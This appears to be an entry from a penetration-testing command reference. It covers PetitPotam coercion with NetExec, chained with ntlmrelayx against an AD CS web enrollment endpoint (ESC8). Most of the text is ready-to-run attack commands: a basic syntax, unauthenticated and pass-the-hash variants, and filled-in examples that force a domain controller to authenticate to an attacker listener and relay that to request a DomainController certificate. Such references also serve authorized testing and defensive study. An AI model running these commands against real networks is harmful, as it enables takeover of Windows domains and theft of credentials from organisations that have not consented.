NetExec PetitPotam Coercion

Coerce a Windows host (typically a DC) to authenticate back to the attacker via the EFSRPC interface (PetitPotam). Pair with ntlmrelayx.py -t http://<ca>/certsrv/certfnh.asp for ESC8.

Tool
nxc
Category
Credential Attacks / NTLM Relay & Coercion
Platform
linux
Requires
password
Protocols
SMB, RPC

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

nxc smb <ip> -u <user> -p <password> -M petitpotam -o LISTENER=<attacker_ip>

Credential variants

The same attack using a different authentication material.

Unauthenticated (Pre-Patch) requires no credentials

nxc smb <ip> -u '' -p '' -M petitpotam -o LISTENER=<attacker_ip>

NTLM Hash requires NTLM hash

nxc smb <ip> -u <user> -H <hash> -M petitpotam -o LISTENER=<attacker_ip>

Examples

nxc smb dc01.corp.local -u jdoe -p 'Password123!' -M petitpotam -o LISTENER=10.10.14.5
ntlmrelayx.py -t http://ca01.corp.local/certsrv/certfnh.asp --adcs --template DomainController

Tags

nxc netexec petitpotam coercion ntlm-relay efsrpc

References